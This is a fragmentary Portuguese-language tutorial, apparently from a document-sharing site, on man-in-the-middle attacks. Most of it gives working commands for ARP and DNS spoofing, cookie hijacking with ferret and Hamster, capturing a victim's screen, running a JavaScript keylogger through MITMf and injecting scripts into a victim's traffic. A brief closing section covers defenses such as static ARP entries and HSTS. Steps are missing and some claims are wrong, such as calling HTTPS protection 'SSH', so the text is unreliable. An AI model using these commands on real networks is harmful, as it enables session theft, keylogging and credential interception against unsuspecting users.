Académique Documents
Professionnel Documents
Culture Documents
Neste tutorial iremos abordar o tipo de ataque conhecido como Man in the Middle.
Esse teste "envenena" a Tabela ARP da vitima, fazendo com que a máquina atacante,
nossa, se passe pelo roteador, fazendo com que consigamos interceptar o tráfego e ter
acesso a dados sigilosos trocados entre os dois atores.
3. Habilita a emissão de IP para fluir para nosso aparelho sem ser desconectado.
Echo 1 > /proc/sys/net/ipv4/ip_forward
MODO 2 MITMF
O MITMf (Man-In-The-Middle Framework) é uma ferramenta de ataque do Man-In-
The-Middle que visa fornecer uma unica ferramenta para ataques de Man-In-The-
Middle (MiTM) e de rede enquanto atualiza e melhora os ataques e técnicas
existentes.
Sites como o google e facebook tem proteção SSH que protegem contra esse tipo de
ataque
Então, ao invés de sniffing a senha, nós podemos sniff o cookies e injetar neles no nosso
navegador, isto permite-nos logar sem usar senha.
ferret -i eth0
vai capturar todo o cookie que for efetivado
Quando a vitima acessar algum site com a opção lembre-me e entrar um cookie em
alguma pagina que já está com o login efetivado o Hamster vai mostrar um endereço que
neste caso é 127.0.0.1:1234
deve copiar esse endereço e ir no kali
Firefox - preferences - advanced - Network - settings - manual proxy configuration
e colocar a porta aberta que nesse caso é 1234
ok
E voilá, você estará conectado com o cookie da vitima sem precisa do user-name e
password.
O ferret não funciona com sites que usam a tecnologia HSTS como o facebook e google
por exemplo
var/www/html/index.html
Entrará em uma pagina que terá index.html
há varios modelos prontos de sites para colocar, porém deve tomar cuidado com essas
paginas prontas da internet.
vai abrir uma pagina e deve ir até o fim e verá os subdomains de qualquer site
Veremos que o *.live.com será redirecionado ao IP 10.20.14.203 que é o nosso próprio IP,
no qual podemos configurar para qualquer domínio da internet em qualquer companhia
de HOST
mitmf --arp --spoof --gateway (ip do router) --target (ip do target) -i eth0 --dns
terá uma informação que DNS spoofing enabled e ARP spoofing enabled
Já estará funcionando e você poderá instalar através desse site qualquer coisa, ou colocar
uma pagina fácil para pegar informações do alvo.
O spoofing de DNS não funcionará contra o Facebook porque ele usa o HSTS, e o motivo
que não funciona contra sites da HSTS é porque os navegadores modernos vêm com uma
lista de sites que só podem navegar como HTTPS e desde que você é redirecionando o
destino para seu host local que não usa HSTS, o navegador simplesmente se recusará a
carregar o site.
MITMF plug-ins
Outra Feature legal que o MITMF tem é os plug-ins
Podemos ver todos os plug-ins digitando:
> mitmf --help
Capturando a tela da vitima
Você pode mudar o intervalo das capturas de tela e se não digitar o comando interval será
o default de 10 segundos
--screen
--interval (seconds) (se não colocar interval vai ser padrão de 10 em 10 segundos)
mitmf --arp --spoof --gateway (ip do router) --target (ip do target) -i eth0 --screen --
interval
As fotos ficam no diretório do kali var/log/mitmf
Mesmo que já podemos ver os logins e passwords com o MITMF podemos ver tudo o que
a vitima digita através do comando java script keylogger
mitmf --arp --spoof --gateway (ip do router) --target (ip do target) -i eth0 --jskeylogger
Se a vitima entrar em qualquer site e digitar veremos tudo:
Dessa forma teremos muita informação, o que dificulta bastante a analise posterior.
Injetando Código
Começaremos injetando um código bem simples pelo terminal, ele só irá disparar um alerta.
> mitmf --arp --spoof --gateway (ip do router) --targets (ip do target) -i eth0 --inject --js-
payload “alert(‘test’)”;”
Muitas vezes o código pode ser bem grande por isso é mais fácil colocar o código em um
arquivo e no arquivo injetar o código.
>leafpad
> mitmf --arp --spoof --gateway (ip do router) --targets (ip do target) -i eth0 --inject --js-file
/root/alert.js
Esses códigos foram bem simples, mas poderá ser utilizado com qualquer outro.
Erros:
O MITMf não funciona com a ultima versão do Twisted, a solução é:
If that command gave you errors, then remove it manually using this command:
rm -rf /usr/lib/python2.7/dist-packages/twisted
2. Wireshark:
Defesas
1. Manter seu MAC em Static e não Dynamic nas configurações do router e para
empresa grande é difícil pois precisa configurar sempre
Se o site utilizasse o método HSTS, abreviação para HTTP Strict Transport Security, o
servidor informaria ao navegador que a conexão entre ambos só pode ser feita de forma
segura. Assim, no início do processo, o browser faria a ligação com o site do banco,
receberia as informações e emitiria uma notificação de que a conexão não é segura e,
portanto, não pode ser completada, evitando a interceptação dos seus dados.
A ideia parece simples e genial, afinal você não precisa fazer nada: o navegador trabalha
em conjunto com a página para evitar ações mal intencionadas. Entretanto, apenas
Firefox, Chrome e Opera têm suporte para HSTS — o Internet Explorer, navegador mais
usado no mundo, não trabalha com esse tipo de recurso.
Informação e cuidado
A Electronict Frontier Foundation (EFF), organização sem fins lucrativos que defende as
liberdades civis na internet, aponta que um dos principais motivos para a ausência do
recurso em um maior número de sites é o desconhecimento dos programadores.
Entretanto, como muita gente ainda utiliza o Internet Explorer e também como muitos
sites ainda não trabalham com a tecnologia HSTS, a maior ferramenta para evitar cair em
uma armadilha dessas é ficar atento. Inspecione bem as páginas que visita quando acessa
a web a partir de uma rede aberta, pois por mais improváveis que possam parecer, as
ameaças existem.